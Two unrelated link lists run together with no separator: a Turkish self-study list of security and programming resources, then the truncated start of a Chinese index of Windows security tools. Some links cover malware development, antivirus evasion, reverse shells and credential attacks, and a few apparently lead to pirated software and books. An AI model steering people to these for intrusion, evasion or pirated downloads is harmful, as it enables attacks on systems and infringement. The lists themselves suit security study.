https://www.exploit-db.com/docs/turkish/42757-[turkish]-windows-and-linux-privilege-escalation.pdf - https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/ * ### Web Security - https://docplayer.biz.tr/311180-Web-uygulama-guvenligi-101-mehmet-ince-mehmet-ince-bga-com-tr.html - https://www.youtube.com/watch?v=WtHnT73NaaQ&list=PLwP4ObPL5GY940XhCtAykxLxLEOKCu0nT - https://www.youtube.com/watch?v=3AgDSw0I89A - https://docs.google.com/document/d/1PHs7uRS1whLY9tgxH1lj-bnEVWtXPXpo45zWUlbknpU/edit - https://www.youtube.com/watch?v=rHxX5LB1--4 - https://www.youtube.com/watch?v=1nJgupaUPEQ - https://docplayer.biz.tr/311180-Web-uygulama-guvenligi-101-mehmet-ince-mehmet-ince-bga-com-tr.html - https://www.youtube.com/watch?v=WtHnT73NaaQ&list=PLwP4ObPL5GY940XhCtAykxLxLEOKCu0nT - https://www.youtube.com/watch?v=3AgDSw0I89A - https://portswigger.net/web-security/all-labs - https://www.youtube.com/playlist?list=PLwP4ObPL5GY940XhCtAykxLxLEOKCu0nT - https://github.com/mdisec/mdisec-twitch-yayinlari - https://www.hacker101.com/sessions/pentest_owasp - https://omercitak.com/dom-based-xssi-anlamak/ - https://omercitak.com/xss-zafiyeti-ile-oturum-calma-session-hijacking/ - https://youtu.be/HQklNh8961c - https://docplayer.biz.tr/311180-Web-uygulama-guvenligi-101-mehmet-ince-mehmet-ince-bga-com-tr.html - https://infosecwriteups.com/server-side-request-forgery-ssrf-8e0fa290f7e6 - https://sadicanustun.com.tr/posts/web-uygulamalarinda-race-condition-zafiyeti/ - https://www.veracode.com/security/race-condition - https://hakantasan.com/index/makaleler/95/session-cookies-nedir-ve-nasil-calisir-session-nedir-session-nasil-calisir/ - https://avnikasikci.studio/idor-insecure-direct-object-reference-zafiyetleri/ - https://www.webguvenligi.org/asvs/OWASP_ASVS_TR_v2-0.pdf - https://medium.com/@mmgoktas38/cross-site-scripting-xss-zafiyeti-nedir-fc149be926db - https://www.youtube.com/watch?v=-BPnSQou8yw&list=PLwP4ObPL5GY940XhCtAykxLxLEOKCu0nT&index=7 - https://www.siberguvenlik.web.tr/index.php/2021/05/11/xxe-injection-nedir/ - http://index-of.es/Hack/No.Starch.The.Tangled.Web.Nov.2011.pdf - https://code-elif.blogspot.com/2022/01/spring-security-5-ve-oauth-20-ile-web.html - https://github.com/mdisec/topluluk-makale/tree/master/HTTP%20Headers%20and%20Cookies - https://application.security/free/owasp-top-10 - https://www.youtube.com/watch?v=WtHnT73NaaQ&list=PLwP4ObPL5GY940XhCtAykxLxLEOKCu0nT - https://hacklido.com/blog/183 - [Http Request ve Http Response nedir](https://youtu.be/PD8r9ISYgQo) * ### Malware Analysis and Coding - [Malware Coding Roadmap](https://www.quora.com/How-do-you-get-into-malware-development) - https://tryhackme.com/room/rpmetasploit - https://techsupportwhale.com/wp-content/uploads/2020/05/Types-of-Malware.pdf - https://marsisinovasyon.com/en-kapsamli-ansys-statik-analiz-firma/ - https://www.turkhackteam.org/konular/temel-statik-malware-analiz-c-reverse-shell.1967601/ - https://umuttosun.com/malware-analizi/ - https://academy.binance.com/tr/articles/what-is-a-digital-signature - https://cnsatuva.github.io/files/Intro_Reverse_Malware_Analysis.pdf - https://www.sentinelone.com/labs/top-15-essential-malware-analysis-tools/ - https://tr.secnews.gr/101781/mousejack-sald%C4%B1r%C4%B1s%C4%B1/ - https://www.crowe.com/cybersecurity-watch/wireless-peripheral-hijacking-mousejack-attacks-explained-dgs - https://www.udemy.com/share/105Jps3@5IcOMql36YhdTgEq_nLvCUIr2LPQjsu6COSFt3MGbUXtgxCOg-ryjbJwOZTne1PtdQ==/ - https://dergidir.com/dijital-imza-nedir/ - https://gaissecurity.com/bilgi/zararli-yazilim-analiz-teknikleri/ - https://tech-zealots.com/malware-analysis/pe-portable-executable-structure-malware-analysis-part-2/ - https://osmanmarangoz.wordpress.com/2009/06/14/soket-programlamasocket-programming/ - https://kerteriz.net/python-socket-programlama-nedir/ - https://www.howtogeek.com/196672/windows-memory-dumps-what-exactly-are-they-for/ - https://helpdeskgeek.com/windows-10/how-to-analyze-memory-dump-files-dmp-in-windows-10/ - https://www.squiddylab.com/emotet-zararli-yaziliminin-teknik-analizi/ - https://securityliterate.com/malware-analysis-in-5-minutes-deobfuscating-powershell-scripts/ - https://threatpost.com/powershell-payload-analysis-malware/165188/ - https://www.crowdstrike.com/cybersecurity-101/malware/malware-analysis/ - http://dlupdate.quickheal.com/documents/technical_papers/introduction_to_malware_and_malware_analysis.pdf - https://cdn.ttgtmedia.com/rms/pdf/bookshelf_malware_analysis_techniques_excerpt.pdf - https://www.winitor.com/pdf/Malware-Analysis-Fundamentals-Files-Tools.pdf - https://zeltser.com/media/docs/intro-to-malware-analysis.pdf - http://venom630.free.fr/pdf/Practical_Malware_Analysis.pdf - https://tryhackme.com/room/vulnnetinternal - https://tryhackme.com/room/malmalintroductory - https://www.pinvoke.net/default.aspx/kernel32/DLLs.html - https://umuttosun.com/portable-executablepe-file-format-i/ - https://www.ired.team/miscellaneous-reversing-forensics/windows-kernel-internals/pe-file-header-parser-in-c++ - https://pentest.blog/art-of-anti-detection-1-introduction-to-av-detection-techniques/#more-120 - https://pentest.blog/art-of-anti-detection-2-pe-backdoor-manufacturing/#more-194 - https://pentest.blog/art-of-anti-detection-3-shellcode-alchemy/#more-696 - https://pentest.blog/art-of-anti-detection-4-self-defense/#more-1631 - https://pentest.blog/introducing-new-packing-method-first-reflective-pe-packer/#more-1141 - https://www.youtube.com/playlist?list=PLDpFwQfbVxIw_rysNCHPeGmh6wIUnhjrt - https://www.ired.team/miscellaneous-reversing-forensics/aes-encryption-example-using-cryptopp-.lib-in-visual-studio-c++ - https://fatihsensoy.com/Process-Injection-Teknikleri/ - http://www.tolgasezer.com.tr/2015/07/tut-crypter-binder-packer-nedir.html - https://www.priviasecurity.com/dll-injection/ - https://github.com/m0n0ph1/Process-Hollowing - https://www.youtube.com/watch?v=v4OydHD-W7Q - https://cuckoosandbox.org/ * ### Elektronik - https://www.youtube.com/watch?v=wMfkpeOLWD8&t=469s - https://www.youtube.com/watch?v=bEr9SIVno9c - https://www.udemy.com/course/elektronik-temellerine-giris-tasarim-ve-uygulamalar-2020/ * ### Algoritma - https://www.tasarimkodlama.com/kategori/algoritma/ - https://www.tasarimkodlama.com/kategori/algoritma/ - https://www.youtube.com/watch?v=Q2DoA4HID5A&list=PLR_3k5Bkz0SBA9PoV6DrxpghD7pqPScGJ * ### Genel dev - https://github.com/fatihacet/turkcekaynaklar-com - https://www.birlikteihracat.com/yeni-yazilimciya-oneriler/ - https://www.codingame.com/ide/puzzle/onboarding - https://github.com/aycanogut/front-end-resources - https://www.linkedin.com/posts/rogerfavelron_think-different-a-different-roadmap-to-activity-6870708283796258816-AyDf - https://roadmap.sh/ - https://goalkicker.com/ - https://github.com/melihthedev/books-1 - https://www.w3schools.com/ - https://www.savol-javob.com/tr/yeni-ba%C5%9Flayanlar-i%C3%A7in-bir-web-programlama-haritas%C4%B1/ - https://www.youtube.com/watch?v=y745R3Lv9WI&t=24027s&ab_channel=Yaz%C4%B1l%C4%B1mBilimi - [Pointer Nedir](https://youtu.be/53iB4gnUEiU) - https://www.freecodecamp.org/learn - [Veri Tipleri](https://gelecegiyazanlar.turkcell.com.tr/konu/egitim/c-101/veri-tipleri) - https://tr.khanacademy.org/computing/computer-programming - [Sunucu tarafında Node.js ve ön tarafta React.js kullanarak nasıl Google Authentication yapılabilir](https://medium.com/software-development-turkey/node-js-react-js-kullanarak-google-authentication-sa%C4%9Flama-e66758474ea2) - [Full Stack Web Dev Course](https://www.youtube.com/playlist?list=PLZlA0Gpn_vH8jbFkBjOuFjhxANC63OmXM) - [Front End](https://microsoft.github.io/frontend-bootcamp/) - [Front Endd](https://github.com/Microsoft/frontend-bootcamp#frontend-bootcamp--days-in-the-web) - https://learnxinyminutes.com/ - [gunluk challangelarin yayinlandigi bir site](https://imaginary.ml/) * ### Python - https://automatetheboringstuff.com/ - https://python-istihza.yazbel.com/ - https://www.youtube.com/watch?v=EzHgbO1Cee4&list=PLWctyKyPphPiul3WbHkniANLqSheBVP3O - https://www.btkakademi.gov.tr/portal/course/player/deliver/s-f-rdan-ileri-seviye-python-programlama-5877 - https://www.youtube.com/playlist?list=PLWctyKyPphPiul3WbHkniANLqSheBVP3O - https://suleymanogrekci.wordpress.com/python-dersleri/ - https://www.google.com/amp/s/kerteriz.net/python-socket-programlama-nedir/amp/ - [Kendi python kutuphanenizi yayinlama](https://youtu.be/7NsJK1wrp1Y) - https://s5.dosya.tc/server5/nh5xw5/rogramming-For-Total-Beginners-No-Starch-Press-2019.pdf.html * ### go - https://youtu.be/goC2z7n9fq4 - https://www.tasarimkodlama.com/go-programlama/go-programlama-dili-dersleri/ - https://www.youtube.com/playlist?list=PL-Hkw4CrSVq96dPr33xTdBjSgn9wKLHPa - https://mega.nz/file/KdYhRIyQ#k9NWOo8HZGcT6GOF6RzbqZ2_71sWh6ehPJIR22Vt6mE - https://www.tutorialspoint.com/go/index.htm - https://gobyexample.com/ - https://www.guru99.com/google-go-tutorial.html - https://www.javatpoint.com/go-tutorial - https://www.w3schools.com/go/index.php - https://www.cosmiclearn.com/go/index.php - https://www.golangprograms.com/go-language.html - https://edu.anarcho-copy.org/T%C3%BCrk%C3%A7e%20-%20Turkish/Go%20T%C3%BCrk%C3%A7e%20kaynak_.pdf*/ - https://github.com/mdisec/golang-for-hackers-turkish-edition - https://www.youtube.com/watch?v=jR683fqYVOo - [golang ile web gelistirme](https://lnkd.in/eQXMabS) - https://go.kaanksc.com/ * ### C - https://mega.nz/file/PEQ1XAjY#PsETDPrZ_h7IuvwxhM12DLyVR0klfyfSMO27eeGCJX0 - https://www.youtube.com/watch?v=w3_e9vZj7D8&t=3076s - https://www.youtube.com/watch?v=443UNeGrFoM&t=4177s * ### HTML - https://www.youtube.com/watch?v=nLCveeY8CAE&list=PLPn_xAjZBn1NyFqD5UEsBQ_tGxN3-zEhU - https://html.sitesi.web.tr/html-dili.html * ### CSS - https://www.youtube.com/watch?v=u4wyRgRiiUU - https://mega.nz/file/yYAxXCbK#yYaNrI1F592WFneZ-1SZ1GGYS-OFOm3k5Rmv-gxpCEw - [FlexBox nedir](https://1sahinomer1.medium.com/css-flexbox-3339ebd92085) * ### JavaScript - https://www.yazilimbilisim.net/javascript/javascript-dersleri/ - https://www.tasarimkodlama.com/web-tasarimi/javascript-programlama/javascript-ogrenmeye-nereden-baslanir-neden-javascript-ogrenmeliyim/ - https://www.youtube.com/watch?v=iBww_qa_bV8 - https://www.youtube.com/watch?v=CPcpcqaQRvw&list=PLY20HpFruiK12kqke7T5OQVu1BK2ELQL8 - https://medium.com/kodluyoruz/javascripti-kim-geli%C5%9Ftiriyor-4f3bee2b2a15 - https://github.com/TheAlgorithms/Javascript - https://github.com/trekhleb/javascript-algorithms - https://github.com/ilker0/33-js-concepts * ### Php - https://www.yusufsezer.com.tr/php-dersleri/ - https://www.youtube.com/watch?v=9HVUtA-JENo&list=PLciTNdnGYqpFIyafqIkFHiHFbGdE6Y35K * ### Sql - https://www.btkakademi.gov.tr/portal/course/uygulamalarla-sql-ogreniyorum-8249 - https://www.hosting.com.tr/bilgi-bankasi/sql-nedir/ - https://tr.khanacademy.org/computing/computer-programming/sql * ### React Native - https://www.youtube.com/watch?v=mfHRZLoRM0Y * ### Bash scripting - https://www.youtube.com/playlist?list=PLPa55dyKM2F0Or4a1E3ir1ZUZkjM1bubZ - https://devhints.io/bash * ### C++ - https://www.youtube.com/playlist?list=PLsLILIGvjrijwl8AMCD0pIg9VWxAXY9E1 * ### C# - https://youtu.be/7mWYhTPnD04 - https://www.kodlama.io/p/yazilim-gelistirici-yetistirme-kampi - https://youtube.com/playlist?list=PLqG356ExoxZU5keiJwuHDpXqULLffwRYD - https://www.btkakademi.gov.tr/portal/course/c-7008 - https://www.w3schools.com/cs/index.php - https://youtube.com/playlist?list=PLKnjBHu2xXNPkeQtMOJczzEO6LK5OV35K - [OOP C#](https://mhmtbsrglu-2.medium.com/nesne-y%C3%B6neli%CC%87mli%CC%87-programlamaya-gi%CC%87ri%CC%87%C5%9F-ve-m%C3%BC%C5%9Fteri%CC%87-%C3%B6rne%C4%9Fi%CC%87-oop-introduction-with-example-of-29880ae053a8) * ### Assembly - https://gpfault.net/posts/asm-tut-0.txt.html - https://www.tutorialspoint.com/assembly_programming/index.htm - https://www.cs.virginia.edu/~evans/cs216/guides/x86.html * ### Unity - https://youtu.be/pwZpJzpE2lQ - https://docs.unity3d.com/Manual/index.html - https://www.youtube.com/watch?v=who6TEPt4is&list=PLo7_YgjhDT-1x-un___OqPrnz8f8W7Hsj * ### Mobile sec - https://www.youtube.com/playlist?list=PLwP4ObPL5GY_dBI_lSwBzKM4zxP4mWSqK * ### Yapay zeka - https://www.linkedin.com/newsletters/herkes-i%25C3%25A7in-yapay-zeka-6866740767273046017/ * ### IOT - https://www.youtube.com/playlist?list=PL1RexjmoB3phyupWC1bAeiBK0PY90ebwA * ### Bilgisayar bilimleri - https://www.youtube.com/watch?v=Sv2uk0PGZCY&list=PLWtwsoCi5xAFCgNHQHo_BxuCPcL9NrT-e * ### Kriptoloji - https://www.youtube.com/watch?v=Sv2uk0PGZCY&list=PLWtwsoCi5xAFCgNHQHo_BxuCPcL9NrT-e - https://www.youtube.com/watch?v=0RECW49LmHM&list=PLR_3k5Bkz0SAgl6aeXR-4_3Gtv9rywoBa - https://jwt.io/ - https://youtu.be/YIZxgBI7csw - https://medium.com/@hicranozkan/simetrik-ve-asimetrik-anahtarl%C4%B1-%C5%9Fifreleme-algoritmalar%C4%B1-a60a4e0eb079 - https://www.mehmetince.net/crypto-101-5-sifreleme-operasyonu-modlari-ecb-cbc-ofb/ * ### Cloud - https://aws.amazon.com/tr/what-is-cloud-computing/ - https://aws.amazon.com/tr/getting-started/fundamentals-core-concepts/?e=gs2020&p=gsrc - https://ayberk.ninja/aws-enumeration * ### Veritabanlari - https://immibbilisim.com/moduller/3-%20Veritaban%C4%B1nda%20Sorgular.pdf - http://auzefkitap.istanbul.edu.tr/kitap/kok/yonetimbilisimsistemleriau232.pdf - https://www.oracle.com/tr/database/what-is-database/ * ### Genel güzel siber güvenlik PDFleri - https://berqnet.com/uploads/herkesicin_siberguvenlik.pdf - https://ekitap.alternatifbilisim.org/pdf/hack-kulturu-ve-hacktivizm.pdf - https://www.siberguvenlik.online/2021/12/04/siber-guvenlik-terimleri-sozlugu-2/ - https://ekitap.alternatifbilisim.org/pdf/hack-kulturu-ve-hacktivizm.pdf - https://www.sasad.org.tr/uploaded/Siber-Guvenlik-ve-Savunma-Standartlar-ve-Uygulamalar-Siber-Guvenlik-Cilt-3.pdf - https://www.prismacsi.com/1-siber-guvenlik-temelleri/ - https://www.mehmetince.net/category/cyber-security/penetration-test/ - https://www.btkakademi.gov.tr/portal/course/player/deliver/siber-guvenlik-temelleri-egitim-paketi-11961 - https://drive.google.com/drive/folders/1dOcAgLfhfBc0eNtQmgtbWDyCtsg5gIiK * ### Bolca pdf, makale bulunduran kendiniz bulabileceginiz siteler ve arsivler - https://siberataksavunma.com/ - https://flaviocopes.com/page/list-subscribed/?ref=python-book - https://docplayer.biz.tr/search/?q=linux+ - https://www.corelan.be/index.php/articles/ - https://doc.lagout.org/ - https://drive.google.com/drive/folders/12E5wVhmtSNkkFXsRyH2bX3wikYmGBRDE?usp=sharing - https://mega.nz/folder/7E4jFYTb#AWm4et8AH8XfFg0GeEnjQA - https://github.com/tanc7/hacking-books - http://turkcekaynaklar.com/ - https://x0rb3l.github.io/Cyber-Bookmarks/bookmarks.html * ### Fiziksel saldirilar ve fiziksel siber guvenlik - https://nuriacar.com/cevizlab/2020/10/16/badusb.html - https://www.sans.org/white-papers/37120/ - http://www.aljazeera.com.tr/al-jazeera-ozel/siber-dunyanin-kiyamet-silahi-bad-usb - https://doc.lagout.org/security/Charles.C.Thomas-Document.Security.Protecting.Physical.and.Electronic.Content.2007.RETAiL.EBook.pdf - https://www.osti.gov/servlets/purl/1427000 - https://scadahacker.com/library/Documents/White_Papers/Tripwire%20-%20When%20Cyber%20Attacks%20Get%20Physical.pdf - https://tsapps.nist.gov/publication/get_pdf.cfm?pub_id=923409 - https://fengweiz.github.io/paper/badusbc-woot21.pdf - https://sepio.systems/wp-content/uploads/2020/08/BadUSB-Case-Study-new.pdf - https://res.mdpi.com/d_attachment/electronics/electronics-08-01322/article_deploy/electronics-08-01322-v2.pdf * ### Exploit Dev - https://dayzerosec.com/blog/2021/02/02/getting-started.html - https://exploit.education/ - https://opensecuritytraining.info/Exploits1.html - https://exploit.education/phoenix/ - https://ropemporium.com/index.html - https://www.youtube.com/watch?v=8Dcj19KGKWM - https://www.youtube.com/watch?v=zaQVNM3or7k - https://www.signalsec.com/exploit-gelistirme-egitimi.php - https://gurelahmet.com/stack-tabanl%c4%b1-buffer-overflow-zafiyeti-pcman-ftp-server-2-0-7/ - https://www.fuzzysecurity.com/index.html - https://github.com/wtsxDev/Exploit-Development - https://www.sans.org/cyber-security-courses/advanced-penetration-testing-exploits-ethical-hacking/ - https://www.offensive-security.com/awe/EXP401_syllabus.pdf - https://tryhackme.com/room/intropocscripting - https://netsec.ws/?p=262 - https://null-byte.wonderhowto.com/how-to/exploit-development-everything-you-need-know-0167801/ - https://github.com/tanc7/hacking-books/blob/master/Violent%20Python%20-%20A%20Cookbook%20for%20Hackers%2C%20Forensic%20Analysts%2C%20Penetration%20Testers%20and%20Security%20Engineers.pdf - https://tryhackme.com/room/introtopwntools - https://tryhackme.com/room/introtox8664 - https://github.com/Tib3rius/Pentest-Cheatsheets/blob/master/exploits/buffer-overflows.rst - https://tryhackme.com/room/postexploit - https://www.reddit.com/r/ExploitDev/comments/7zdrzc/exploit_development_learning_roadmap/ - https://www.reddit.com/r/ExploitDev/comments/7ywp7a/exploit_development_books/ - https://github.com/midnightslacker/exploit_training - https://0x00sec.org/c/exploit-development/53 - https://dayzerosec.com/blog/2021/02/02/getting-started.html - https://www.fuzzysecurity.com/tutorials/expDev/1.html - https://github.com/rosehgal/BinExp - https://github.com/midnightslacker/exploit_training - https://dayzerosec.com/blog/2021/02/02/getting-started.html - [Operating System Concepts Book](http://web.cse.ohio-state.edu/~soundarajan.1/courses/3430/silberschatz8thedition.pdf) - [Operating System Concepts kitabi turkce anlatim](https://www.youtube.com/watch?v=r2q_XRKrqHQ&list=PLh9ECzBB8tJO9eiwfQbcA2ThMbUSkbOWf&index=3) * ### Bug Bounty - [Hacking'i Öğrenmek İçin Adım Adım Rehber](https://www.youtube.com/watch?v=2TofunAI6fU) - [İlk Bug'ınızı Avlayın](https://portswigger.net/blog/finding-your-first-bug-bounty-hunting-tips-from-the-burp-suite-community) - [Port Swigger Web Güvenlik Akademisi](https://portswigger.net/web-security/learning-path) - [Nahamsec'in Twitch'i](https://www.twitch.tv/nahamsec) - [Nahamsec'in En İyi Bug Bounty Avcılarıyla Olan Röportajları](https://www.youtube.com/c/Nahamsec) - [Nahamsec'in Başlangıç Seviyesi İçin Kaynakları](https://github.com/nahamsec/Resources-for-Beginner-Bug-Bounty-Hunters) - [Stök YouTube Kanalı](https://www.youtube.com/c/STOKfredrik) - [InsiderPhD Youtube Kanalı](https://www.youtube.com/c/InsiderPhD) - [Yeni Bug Bounty Avcıları İçin Oynatma Listesi](https://www.youtube.com/playlist?list=PLbyncTkpno5FAC0DJYuJrEqHSMdudEffw) - [Jhaddix YouTube Kanalı](https://www.youtube.com/c/jhaddix) - [KingOfBugBountyTips](https://github.com/KingOfBugbounty/KingOfBugBountyTips) Hacker101 Üyelerinden, Hacklemeye Nasıl Başlayacağınıza Dair Yazılar: - [zonduu](https://medium.com/@zonduu/bug-bounty-beginners-guide-683e9d567b9f) - [p4nda](https://enfinlay.github.io/bugbounty/2020/08/15/so-you-wanna-hack.html) - [Ayrıca Subdomain Ele Geçirmeyle İlgili Bir Blog](https://enfinlay.github.io/sto/ip/domain/bugbounty/2020/09/12/ip-server-domain.html) - [clos2100'ün Teknik Bir Altyapınız Olmadan Neler Yapabileceğiniz Hakkındaki Tweet'i](https://twitter.com/pirateducky/status/1300566000665014275) - [el-madjus'un 0'dan Bug Bounty Hunter Olma Hikayesi](https://klarsen.net/uncategorized/from-0-to-bug-hunter-my-journey/) - [dee-see'nin Android Hacking Kaynakları](https://blog.deesee.xyz/android/security/2020/01/13/android-application-hacking-resources.html) - [hacker101 Eğitim Videoları](https://www.hacker101.com/) - https://github.com/tomnomnom - https://github.com/hahwul/dalfox - https://github.com/KingOfBugbounty/KingOfBugBountyTips * ### Reverse Eng - https://repo.zenk-security.com/Reversing%20.%20cracking/Practical%20Reverse%20Engineering.pdf * ### Kitap && Kurs Onerileri - https://www.kodlab.com/programlama/76-web-gelistiricileri-icin-linux-9786052118146.html - https://www.kodlab.com/network/86-temel-network-9786052118313.html?search_query=network+&results=22 - https://www.amazon.com.tr/%C4%B0%C5%9Fletim-Sistemleri-ve-Sistem-Programlama/dp/605445451X/ref=asc_df_605445451X/?tag=trshpngglede-21&linkCode=df0&hvadid=510296671580&hvpos=&hvnetw=g&hvrand=203406158658766379&hvpone=&hvptwo=&hvqmt=&hvdev=c&hvdvcmdl=&hvlocint=&hvlocphy=1012782&hvtargid=pla-844334325071&psc=1 - https://urun.n11.com/bilgisayar-kitaplari/gnu-linux-egitim-kitabi-P411271880 - https://www.udemy.com/course/cicso-ccna-200-125-egitimi/ - https://www.udemy.com/course/ag-guvenligi-ccna-security-egitimi/ - https://www.udemy.com/course/complete-networking-fundamentals-course-ccna-start/ * ### Diger - [cv oluşturma](https://flowcv.io/) - [openvpn sunucusu kurma](https://hwp.com.tr/kendi-openvpn-sunucunuzu-kurun) - [vim kullanimi](https://youtu.be/c5RIbynHoYI) - [nmap kullanim](https://www.slideshare.net/cnrkrglu/nmap101-eitim-sunumu-nmap-kullanm-klavuzu) - [API nedir](https://ata.com.tr/blog-detay/api-nedir-nasil-calisir-159) - [Bir dakikada api nedir](https://mhmtbsrglu-2.medium.com/1-daki%CC%87ka-da-api-c7dfffbcd422) - [lunizz siber guvenlik sss](https://github.com/LuNiZz/siber-guvenlik-sss) - [Utku Sen Egitimler](https://www.youtube.com/watch?v=oPS5v7OTjnw&list=PLAa-yEtapD02JxtOFw3GiSvgT40UqVsus) - [black box ve white box testleri nedir?](https://www.beyaz.net/tr/guvenlik/makaleler/black_box_ve_white_box_testi.html) - [Red Team](https://www.priviasecurity.com/siber-guvenlikte-red-team-cozumu/) - [Gentoo Kurulum Kilavuzu](https://www.akindemircan.com/2015/10/gentoo-linux-kurulumu.html) - [hashcat kullanimi](https://www.prismacsi.com/hashcat-kullanimi/) - [Amazon AWS -ucretsiz sanal sunucu acma](https://youtu.be/XgyXomYiIyM) - [MDISEC Twitch](https://www.twitch.tv/mdisec) - [Ingilizce Zamanlar](https://www.youtube.com/watch?v=YoUg06tEMkY) - [Isletim Sistemleri](https://www.youtube.com/playlist?list=PLh9ECzBB8tJO9eiwfQbcA2ThMbUSkbOWf) - [Linus Torvalds](https://youtu.be/o8NPllzkFhE) - [Binary Nedir](https://youtu.be/ai2HX77tpEs) - [Ingilizce](https://www.voscreen.com/) - [Revolution OS (documentary about GNU/Linux)](https://youtu.be/k0RYQVkQmWU) - [Google Hack(pdf bulma)](https://www.blackhat.com/presentations/bh-europe-05/BH_EU_05-Long.pdf) - [all the cheatsheets](https://overapi.com/) - [cheatsheet paylasan bir site](https://devhints.io/) - [Ethical Hacking in 12 Hours](https://youtu.be/fNzpcB7ODxQ) - [Bir SaaS urununu hayata gecirmek](https://youtu.be/cqULp5aYDiE) - [Compiler nasıl çalışır/yazılır](https://www.elektrikport.com/makale-detay/c-derleyicisi-ve-calisma-prensibi/16474#ad-image-0) - [how to become an open source contributor](https://medium.com/@mstrYoda/how-to-become-an-open-source-contributor-6f2f8214c6d2) - [HakanBey sunucusunda asiri guzel ve bir suru pdf](https://discord.com/channels/847598347116478494/877687933837127730/877688633186992168) - [Reverse Shell Generator](https://www.revshells.com/) - [Derslerden yazılıma oyundan yabancı dile binlerce cheetsheet'in olduğu sayfa](https://cheatography.com/) - [İçinde bir sürü yararlı websitesinin ve linkin bulunduğu yararlı bir websitesi](https://turkcekaynaklar.com/) - [acik kaynak projelere nasil katki saglarim, nasil para kazanirim, nasil cv kasarim](https://youtu.be/yzeVMecydCE) - [metasploit kursu](https://www.offensive-security.com/metasploit-unleashed/) - [nessus pro](https://hide01.ir/downloads/nessus-pro/) - [api security](https://github.com/arainho/awesome-api-security) - [endpoint guvenligi](https://www.linkedin.com/pulse/u%C3%A7-noktaendpoint-g%C3%BCvenli%C4%9Fi-fevziye-tas/?originalSubdomain=tr) - [403 bypass tool](https://github.com/M4DM0e/DirDar) - [rate limit bypass tool](https://github.com/cyberstruggle/whitepass) - [arch linux steam icin butun oyun hatalari ve cozumleri](https://wiki.archlinux.org/title/Steam/Troubleshooting) - [sayi sistemlerinin birbiri arasinda donusumu](https://koddefteri.net/dijital-elektronik/sayi-sistemlerinin-birbiri-arasinda-donusumu.html) - [pentesting programlama becerisi gerektirir mi?](https://www.youtube.com/watch?v=wv2YhT89LDU) - [isletim sistemleri ile ilgili neredeyse her sey](http://williamstallings.com/OperatingSystems/) - [kapali kaynak uygulamalarin acik kaynak alternatifleri](https://www.opensourcealternative.to/)
# [所有收集类项目](https://github.com/alphaSeclab/all-my-collection-repos) # Windows - 跟Windows安全有关的资源收集。当前包括的工具个数1100+,并根据功能进行了粗糙的分类。部分工具添加了中文描述。当前包括文章数3300+。 - 此页只包含部分内容. [查看完整版](https://github.com/alphaSeclab/windows-security/blob/master/Readme_full.md) - [English Version](https://github.com/alphaSeclab/windows-security/blob/master/Readme_en.md) # 目录 - [PowerShell](#686597a4cff20c60a8e86116cde645fb) - [PowerSploit](#c65ce176ec6f9bbce520d5b97f4067db) -> [(4)工具](#65a67d0db02390cee295385191ee5ee0) [(12)文章](#0ab243d6d9d07fd24d8aa9a44ea03e89) - [PSAttack](#7a02de4887610ec52c49e64b95fe1580) -> [(3)工具](#65edc029f91b76eab19a2adb39966d55) [(3)文章](#5f6fc3b3e1eac08f477163970696725e) - [其他](#f00255b09a7cea498b2672c2c7447a04) -> [(5)工具](#882141dceab035af73809b75c83477f1) [(7)文章](#06d2309e0637f481cdfac132c86142b3) - [DLL](#89f963773ee87e2af6f9170ee60a7fb2) - [新添加](#4dcfd9135aa5321b7fa65a88155256f9) -> [(107)工具](#9753a9d52e19c69dc119bf03e9d7c3d2) [(152)文章](#b05f4c5cdfe64e1dde2a3c8556e85827) - [DLL注入](#3b4617e54405a32290224b729ff9f2b3) -> [(67)工具](#b0d50ee42d53b1f88b32988d34787137) [(69)文章](#1a0b0dab4cdbab08bbdc759bab70dbb6) - [DLL劫持](#f39e40e340f61ae168b67424baac5cc6) -> [(18)工具](#c9cdcc6f4acbeda6c8ac8f4a1ba1ea6b) [(60)文章](#01e95333e07439ac8326253aa8950b4f) - [DLL旁加载](#7f17d2efd0021063bd713a1b9ee2f46e) -> [(18)文章](#ec3149509e7612fb1a2126948f141bc0) - [PE](#620af0d32e6ac1f4a3e97385d4d3efc0) - [PE解析](#c9d6674c5ab3d9adb7fd295acb7ba7cf) -> [(1)工具](#3cb6b6d0c5f183fc7beed42c26733e39) [(3)文章](#f644a8855d53c26fb4f9799d2733c8c8) - [工具](#574db8bbaafbee72eeb30e28e2799458) -> [(66)工具](#c364a31b0a48b1a528f728def1d3ca05) - [文章](#7e890d391fa32df27beb1377a371518b) -> [(131)文章](#bba6a2ee17956c3bd688c16acac5e502) - [.NET](#b8c834b16722c108f8c30f1b0190f0a1) - [工具](#d90b60dc79837e06d8ba2a7ee1f109d3) - [(36) 新添加](#6b8b4bf156e5f973cf0485d45a94f4c4) - [(5) dnspy](#e26e6693fc840e27099c4363598e02cc) - [(56) 文章](#2612f712f9363ad0d71fc054c4829396) - [登录与认证](#5dc38e490615f91e67ffb2f668c5088a) - [Mimikatz](#360af8f1497fcc2dfd2e32f2b636d718) -> [(13)工具](#17f92a061cc661a040c094c1b3fd32e3) [(128)文章](#c9617bf44965290de6f7b645c15328ea) - [NTLM](#37557d58c549b4988bf0bb0ada5de975) -> [(36)工具](#6c8194db98591f8f68b790975663bc5a) [(128)文章](#f07067c1b70f9c002838e2f4ab25da7d) - [Kerberos](#20f86e3e6a4aa7dc1e5a1e3071e0d500) -> [(28)工具](#fbc6987a538d971f3d85b790fbf0c1e1) [(71)文章](#3a746419a4bc22b8a6425b81b6bd4593) - [Pass-The-Hash](#2e1fd273eb428694a94396509754acb5) -> [(1)工具](#3efc90b9ae87a405e231900020ea33ed) [(52)文章](#5cbd82fde4af3da6516b88c52d2c357a) - [Pass-The-Ticket](#af48434aafea8db423a9bacef64b1620) -> [(3)文章](#e335ccf1622ee0d95b75a4cbb0af5a32) - [winglogon.exe](#fe064b8a783e94169307579efcfc5349) -> [(1)工具](#1e77e9449ab3be5cd9977aa55991c897) [(6)文章](#6d3a0fcab4e6b1199600072b17f941b0) - [LLMNR](#9813233777717d99ef29e2fe63abfefb) -> [(5)工具](#7658d2242abc5b8c24e80a77b3a89321) [(18)文章](#e4227d4373c3aec808349a26c979c522) - [NetBIOS](#d6fd46f65ce1fe687a92a2da9551d7a9) -> [(2)工具](#e41f70bc9d7ba0f1430bed63e2d9aece) [(17)文章](#ce06393f8c683c74ea341a9ef2b48938) - [其他](#cd40abc5c7d4b2907b770e53a60ee3ec) -> [(2)工具](#e522f8282206b84cd670cbb658e4bd75) - [安全防护](#cbdc1e0b908c8f2df368db8bbc65926f) - 